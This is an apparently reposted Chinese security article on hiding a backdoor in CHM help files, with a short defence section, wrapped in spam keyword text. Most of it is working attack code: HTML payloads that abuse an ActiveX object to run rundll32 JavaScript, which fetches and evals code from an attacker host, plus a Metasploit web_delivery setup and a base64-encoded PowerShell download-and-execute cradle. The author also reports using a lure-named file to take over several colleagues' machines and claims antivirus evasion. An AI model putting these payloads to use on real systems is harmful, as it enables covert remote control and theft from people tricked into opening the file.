精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

高級組合技打造捆綁后門及防御建議

安全 應用安全
CHM(Compiled Help Manual)即“已編譯的幫助文件”。它是微軟新一代的幫助文件格式,利用HTML作源文,把幫助內(nèi)容以類似數(shù)據(jù)庫的形式編譯儲存。

一、CHM簡介

在介紹怎么使用CHM來作為后門之前,首先要知道CMH是什么東西。

CHM(Compiled Help Manual)即“已編譯的幫助文件”。它是微軟新一代的幫助文件格式,利用HTML作源文,把幫助內(nèi)容以類似數(shù)據(jù)庫的形式編譯儲存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash、常見圖形文件(GIF、JPEG、PNG)、音頻視頻文件(MID、WAV、AVI)等等,并可以通過URL與Internet聯(lián)系在一起。因為使用方便,形式多樣也被采用作為電子書的格式。

二、CHM制作

CHM的制作方法很多。有多款工具可以使用,這里就不在做詳細的介紹了。本次測試使用了EasyCHM來制作CHM文件,使用起來非常簡單。

新建如下目錄,文件內(nèi)容隨意:

打開EasyCHM,新建->瀏覽。選擇該目錄。默認文件類型:

點擊確認,即可看到預覽的CHM文件:

選擇編譯,即可編譯成CHM文件。

三、CHM Execute Command

14年的時候@ithurricanept 在twitter上發(fā)了一個demo,通過CHM運行計算器:

利用代碼如下:

  1. <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command"    value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>  

將以上代碼寫入html,置于工程目錄進行編譯,生成CHM文件,運行此文件,彈出計算器:

四、去除彈框

有測試過nishang Out-CHM的同學會發(fā)現(xiàn),運行生成的CHM文件的時候會看到明顯的彈框。就像這樣:

某個晚上突然腦洞了一下,想到了一個好的方式來讓他不顯示彈框,即結(jié)合使用JavaScript Backdoor。經(jīng)過測試,成功實現(xiàn)在不彈框的情況下獲取meterpreter會話,此次測試使用一個我修改過的python版 JSRat.ps1 ,地址為:https://github.com/Ridter/MyJSRat。使用方式詳見 readme。

以下為完整的測試過程:

1. 結(jié)合CHM + JSBackdoor

使用交互模式的JSRat server:

  1. python MyJSRat.py -i 192.168.1.101 -p 8080 

訪問 http://192.168.1.101:8080/wtf 獲取攻擊代碼如下:

  1. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c    taskkill /f /im rundll32.exe",0,true);}  

經(jīng)過多次測試,成功將以上命令寫入chm,其Html代碼為:

  1. <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>This is a demo ! <br><OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM    name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","    http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>  

編譯以后運行,可以成功獲取JS交互shell:

直接執(zhí)行cmd /c command 是會有黑框的,可以使用run來避免顯示黑框。執(zhí)行run以后,輸入 whoami > e:\1.txt 之后通過read 來獲取回顯。

2. 獲取meterpreter會話

此次測試獲取meterpreter會話的方式是通過執(zhí)行powershell命令,直接獲取,當獲取客戶端JS 交互shell之后自動執(zhí)行powershell命令,獲取meterpreter會話。具體操作如下:

開啟MSF web_delivery:

  1. ~  msfconsole -Lqmsf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf    exploit(web_delivery) > set lhost 192.168.1.101lhost => 192.168.1.101msf exploit(web_delivery) > set lport 6666lport => 6666msf exploit(web_delivery) > set SRVPORT 8081SRVPORT => 8081msf exploit(web_delivery) >    set uripath /uripath => /msf exploit(web_delivery) > exploit[*] Exploit running as background job.msf exploit(web_delivery) >[*] Started reverse TCP handler on 192.168.1.101:6666[*] Using URL: http://0.0.0.0:8081/[*]    Local IP: http://192.168.1.101:8081/[*] Server started.[*] Run the following command on the target machine:powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX    $n.downloadstring('http://192.168.1.101:8081/');  

裝有powershell的客戶端執(zhí)行以下命令則可獲取meterpreter會話:

  1. powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');  

由于存在特殊字符,我們可以把以上代碼編碼為base64格式,將以下代碼存入power.txt:

  1. $n=new-object net.webclient; $n.proxy=[Net.WebRequest]::GetSystemWebProxy(); $n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; IEX $n.downloadstring('http://192.168.1.101:8081/');  

執(zhí)行以下命令:

  1. cat power.txt | iconv --to-code UTF-16LE |base64  

最終要執(zhí)行的powershell命令為:

  1. powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==  

使用執(zhí)行命令模式直接獲取meterpreter會話:

  1. python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="  

測試過程中,從運行CHM到獲取meterpreter,客戶端無明顯異常,全程無黑框彈出,獲取到meterpreter會話如下圖:

3. 是否被殺?

可能很多人會問,會不會被殺,下面是virscan的查殺結(jié)果:

http://r.virscan.org/report/6173ee9c62d29806bb84035a8f1738ba

五、利用場景

注: 隨便找了幾個漏洞利用工具修改了文件名,并不代表原作者分享的工具有問題。

六、實際測試

是用上述方式制作chm文件,命名為一個比較有吸引力的名字,比如在公司技術群發(fā)了一個名字為”制作免殺后門.chm”的文件,實際測試結(jié)果如下圖:

成功獲取多個人的meterpreter會話。

七、防御

最好的防御就是提高個人安全意識,對于此類文件,多注意一下,盡量別亂點。如果非要點,可以放到虛擬機里面,使用procexp.exe可以看到存在后門的chm文件會開啟新的進程:

對于碰到這種后門,怎么溯源呢,其實也很簡單,chm是可以反編譯為html的。

使用windows自帶的hh.exe 則可進行反編譯。命令如下:

  1. C:\Users\evi1cg\Desktop>hh -decompile test poc.chm  

#test 為當前目錄的test文件夾。

執(zhí)行結(jié)果如下:

這樣就可以看到其源代碼并可以找到攻擊者的監(jiān)聽服務器了。

至于其他防御姿勢,知道的小伙伴可以分享一下。

八、小結(jié)

此次測試就是對一些已知的攻擊手法進行結(jié)合,結(jié)果是讓此捆綁后門更加隱蔽,近乎“完美”,美中不足的是在文件開啟的時候會出現(xiàn)短暫的卡頓。有時候小漏洞結(jié)合起來能造成大危害,小手法結(jié)合起來也能成大殺器。本著分享的精神將此姿勢介紹,希望小伙伴們能免受其害。

九、參考

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2016-04-01 09:32:52

2018-11-20 10:09:28

網(wǎng)絡安全網(wǎng)絡安全技術周刊

2014-06-19 15:44:31

2010-09-25 08:44:34

捆綁后門

2023-01-06 08:42:02

學習訓練

2024-09-03 08:00:00

2009-08-27 17:57:54

2015-12-02 16:46:20

2014-09-18 09:42:15

2010-09-17 16:23:53

分離捆綁后門

2021-12-29 18:16:31

威脅防御

2025-04-29 08:18:48

2009-02-11 19:39:32

IEWindowsChrome

2011-09-29 20:52:51

百銳防御信息安全

2015-12-21 10:28:20

2009-01-03 11:01:06

2016-03-01 11:34:55

2018-01-18 23:06:54

2010-09-30 15:20:01

2023-07-26 17:13:38

點贊
收藏

51CTO技術棧公眾號

欧美精品123| 欧美成人午夜免费视在线看片| www.av毛片| 欧美一级性视频| 久热综合在线亚洲精品| 伊人伊人伊人久久| 国产农村妇女精品久久| 国产一二在线播放| 中文字幕精品综合| 91视频免费进入| 国产黄色免费观看| 欧美激情欧美| 日韩精品www| 九九热精品国产| 绿色成人影院| 亚洲男人都懂的| 欧美一区二区三区电影在线观看| 国产手机精品视频| 久久精品女人天堂| 久久91亚洲人成电影网站| 国精品无码人妻一区二区三区| 国产精区一区二区| 91黄色免费观看| 日韩xxxx视频| 久草免费在线| 亚洲国产精品传媒在线观看| 国产精品自拍首页| 国产片高清在线观看| 久久一区精品| 国内偷自视频区视频综合| av黄色免费在线观看| 要久久爱电视剧全集完整观看| 正在播放亚洲一区| 9久久婷婷国产综合精品性色| 97天天综合网| 亚洲激情综合网| 在线观看亚洲视频啊啊啊啊| 欧美日韩免费做爰大片| 不卡视频一二三| 亚洲一区二区三区xxx视频| 欧美人一级淫片a免费播放| 中文亚洲免费| 欧美精品成人91久久久久久久| 亚洲熟女少妇一区二区| 精品美女久久| 国产精品.xx视频.xxtv| 国产在线播放一区二区三区| 国产精品成av人在线视午夜片 | 91在线观看喷潮| 久久性色av| 欧美专区日韩视频| 久草视频在线观| 欧美一级二区| 国产精欧美一区二区三区| 国产91国语对白在线| 99人久久精品视频最新地址| 午夜精品理论片| 久久高清免费视频| 亚洲承认在线| 国内精品免费午夜毛片| 日韩三级一区二区三区| 国产亚洲精品v| 欧美专区国产专区| 一级特黄免费视频| 青青草国产精品亚洲专区无| 国产精品美乳在线观看| 中文字幕自拍偷拍| 激情综合网最新| 91pron在线| 成人h动漫精品一区二区无码 | 日韩精品人妻中文字幕有码| 91精品国产自产精品男人的天堂| 日韩精品一区二区三区老鸭窝| 2025中文字幕| 奇米777国产一区国产二区| 亚洲欧美国产另类| 国产性猛交xx乱| 亚洲区综合中文字幕日日| 欧美精品一区二区三区国产精品| 久久久久无码国产精品不卡| 亚洲三级毛片| 国产成人在线亚洲欧美| 一卡二卡三卡在线| 国产91精品入口| 欧洲国产精品| 成人黄色在线电影| 天天综合网 天天综合色| 亚洲欧美另类动漫| 国产免费av国片精品草莓男男| 日韩一级欧美一级| 右手影院亚洲欧美| 天天av综合| 91精品国产高清自在线看超| 久久精品国产亚洲av麻豆蜜芽| 狠狠色丁香久久婷婷综合丁香| 国产精品久久九九| bbbbbbbbbbb在线视频| 亚洲色图在线视频| 男人亚洲天堂网| 成人网av.com/| 日韩精品视频在线免费观看| 国产aaaaaaaaa| 亚洲国产午夜| 国产欧美在线看| 香港一级纯黄大片| 亚洲日本在线天堂| 国产日韩成人内射视频| 精品中文字幕一区二区三区| 精品爽片免费看久久| 成年人网站在线观看视频| 日韩午夜免费| 91精品久久久久久久久中文字幕 | 在线观看免费91| 美女网站在线看| 欧美一级午夜免费电影| 免费毛片视频网站| 亚洲作爱视频| 99久久精品免费看国产四区 | 深夜福利一区二区三区| 国产亚洲欧洲黄色| 久久久久久久久久影院| 国产高清视频一区| 一区二区三区四区免费视频| 欧美xxx视频| 亚洲国产精品va| 欧美日韩在线视频免费| 麻豆91精品视频| 欧美国产综合视频| yellow字幕网在线| 日韩精品一区在线| 久久精品黄色片| 日本大胆欧美人术艺术动态| 精品国产一区二区三| 91麻豆免费在线视频| 欧美美女视频在线观看| 亚洲国产av一区| 一区二区激情| 国产综合av一区二区三区| 日本在线观看高清完整版| 4438x成人网最大色成网站| 欧美 日韩 成人| 久久亚洲图片| 欧美在线视频一区二区三区| 美女露胸视频在线观看| 亚洲精品456在线播放狼人| 久久久综合久久| 国产成人啪午夜精品网站男同| 中文字幕av日韩精品| 国内自拍亚洲| 中文字幕亚洲无线码a| 老熟妇一区二区三区| 久久蜜桃av一区二区天堂| 国产精品视频一区二区三区四区五区| 久久人人爽人人爽人人片av不| 欧美黑人性视频| 亚洲国产日韩在线观看| 亚洲午夜日本在线观看| 国产高清成人久久| 免费视频一区| 日韩精品久久一区| 四虎影视成人精品国库在线观看| 色噜噜国产精品视频一区二区 | 日韩一级二级三级| 毛片a片免费观看| 成人av午夜电影| 干日本少妇首页| 精品久久视频| 成人h片在线播放免费网站| 久草中文在线| 欧美精品一区二区三区一线天视频| 欧美日韩在线国产| 99久久精品国产一区二区三区 | 色99中文字幕| 国产精品国产亚洲精品| 国内精品久久影院| 风间由美一区| 欧美一区二区女人| 亚洲欧美在线观看视频| 欧美国产日韩亚洲一区| 在线播放av中文字幕| 欧美亚洲不卡| 欧美一级日本a级v片| 日韩毛片网站| 久久久久久久久久久国产| 三区在线观看| 欧美精品1区2区3区| 亚洲国产综合久久| 国产调教视频一区| 亚洲五月激情网| 国产情侣一区| 一区中文字幕在线观看| 久久99精品久久久久久欧洲站| 国产成人福利网站| 亚洲综合图区| 亚洲天堂第二页| www.com在线观看| 色婷婷av一区二区三区软件| 91传媒免费观看| 97se狠狠狠综合亚洲狠狠| 91n.com在线观看| 亚洲成人资源| 夜夜爽99久久国产综合精品女不卡 | 日本不卡视频在线播放| 国产黄网站在线观看| 日韩av在线电影网| 国产农村老头老太视频| 色综合久久中文字幕| 妺妺窝人体色www婷婷| 中文在线一区二区| 免费黄色三级网站| 国产在线精品免费| 日韩一级片播放| 亚洲高清二区| 丰满人妻一区二区三区53号 | 裸体裸乳免费看| 久久99青青| 国产伦理一区二区三区| 欧美v亚洲v综合v国产v仙踪林| 7777精品久久久久久| 成人a在线视频免费观看| 亚洲欧美制服综合另类| 欧美熟妇另类久久久久久不卡 | 美女少妇一区二区| 99日韩精品| 亚洲中文字幕无码一区二区三区| 不卡在线一区二区| 免费一区二区三区| 国产精品流白浆在线观看| 91传媒视频免费| 日韩国产一二三区| 国产精品视频久久| 九九热线视频只有这里最精品| 久久理论片午夜琪琪电影网| av免费在线观看网址| 神马久久久久久| 成人av毛片| 亚洲性xxxx| 黄色软件在线| 亚洲人线精品午夜| 玖玖综合伊人| 亚洲欧洲xxxx| 欧美新色视频| 亚洲欧美日韩久久久久久| 日韩av成人| 亚洲欧美中文日韩v在线观看| 无码国精品一区二区免费蜜桃| 欧美成人女星排行榜| 性欧美8khd高清极品| 日韩精品一区二区三区蜜臀| 国产黄色片免费观看| 日韩亚洲欧美成人一区| 国内精品国产成人国产三级| 欧美一级艳片视频免费观看| 性一交一乱一乱一视频| 亚洲成av人影院在线观看| 欧美一级在线免费观看| 亚洲第一精品久久忘忧草社区| 人妻91麻豆一区二区三区| 亚洲第一中文字幕在线观看| 五月天福利视频| 亚洲欧美第一页| av在线女优影院| xvideos亚洲| 18加网站在线| 国语自产在线不卡| av免费不卡国产观看| 欧日韩不卡在线视频| 福利一区二区| 成人欧美一区二区三区黑人孕妇 | 91精品国产综合久久精品| 国产日韩欧美中文字幕| 精品欧美一区二区在线观看 | av一级久久| 痴汉一区二区三区| 神马香蕉久久| 日韩资源av在线| 亚洲天堂免费| 国产黄页在线观看| 日本视频在线一区| 欧美日韩久久婷婷| 成人激情黄色小说| 久久精品—区二区三区舞蹈| 中文字幕一区二区不卡| 日韩免费一二三区| 91豆麻精品91久久久久久| 国产视频第一页| 精品视频在线播放免| 美女免费久久| 88国产精品欧美一区二区三区| 国产精品xxx| 国产精品国模大尺度私拍| 精品视频久久| 18禁裸男晨勃露j毛免费观看| 日韩国产在线观看一区| 欧美体内she精高潮| 91丝袜国产在线播放| 中文字幕电影av| 婷婷久久综合九色综合伊人色| www.久久网| 精品国产一区二区国模嫣然| 国产女人在线视频| 久久久久久尹人网香蕉| 国产成+人+综合+亚洲欧美| 国产精品视频500部| 成人免费看片39| 免费看毛片的网址| 久久爱www久久做| 中文字幕在线观看网址| 亚洲女同ⅹxx女同tv| 欧美一区免费看| 亚洲精品一区在线观看| 成人在线网址| 国产精品久久久久久久午夜| 加勒比久久高清| 黄色网址在线免费看| 日韩国产成人精品| 久久国产精品无码一级毛片| 1区2区3区欧美| 天堂免费在线视频| 日韩电影第一页| 青春草视频在线| 成人久久久久久久| 凹凸成人精品亚洲精品密奴| 中文字幕无码精品亚洲35| 国产精品18久久久久久久久久久久 | 国产一区二区三区小说| 国产米奇在线777精品观看| 亚洲高潮女人毛茸茸| 欧美性jizz18性欧美| 天堂中文在线官网| 久久久久久久一| 97超碰成人| 日韩国产小视频| 国产在线观看一区二区 | 亚洲自拍另类综合| 国产伦精品一区二区三区视频痴汉 | 色综合久久网| 天天天干夜夜夜操| 国产婷婷色一区二区三区在线| 精品不卡一区二区| 日韩精品视频在线免费观看| 福利在线免费视频| 5g国产欧美日韩视频| 最新精品国产| 午夜影院免费版| 亚洲精品成人a在线观看| 国产三级伦理片| 欧美富婆性猛交| 999在线精品| 91免费黄视频| 91视频你懂的| av毛片在线免费观看| 亚洲视频一区二区三区| 欧美精品总汇| 亚洲欧美日韩综合一区| 麻豆freexxxx性91精品| 男人晚上看的视频| 亚洲伦在线观看| 三上悠亚久久精品| 岛国av在线一区| 日韩 国产 在线| 日韩www在线| 欧美gay视频| 亚洲精蜜桃久在线| 久久成人免费网| 青青草原免费观看| 亚洲成人精品久久| 日本在线影院| 日本a级片久久久| 卡一卡二国产精品| 538任你躁在线精品视频网站| 日韩欧美国产综合| 草草视频在线观看| 日本一区二区视频| 久久99热99| 久久久久99精品成人片毛片| 亚洲精品动漫久久久久| 精品国产第一福利网站| 亚洲欧洲精品一区二区| 国产美女久久久久| 国产污视频在线看| 亚洲小视频在线观看| 99久久久成人国产精品| 国产一区二区网| 中文字幕av一区二区三区| 一区二区久久精品66国产精品| 欧美激情区在线播放| 国产精品一区二区三区av麻 | 国产在线精品二区| 日韩高清一级片| 欧美成欧美va| 亚洲欧美日韩国产中文专区| 国产精品va视频| 一女被多男玩喷潮视频| 国产精品久久久久久久午夜片| 亚洲精品久久久蜜桃动漫| 国产精品99久久99久久久二8| 91精品99| 中文字幕第4页| 日韩欧美亚洲一区二区|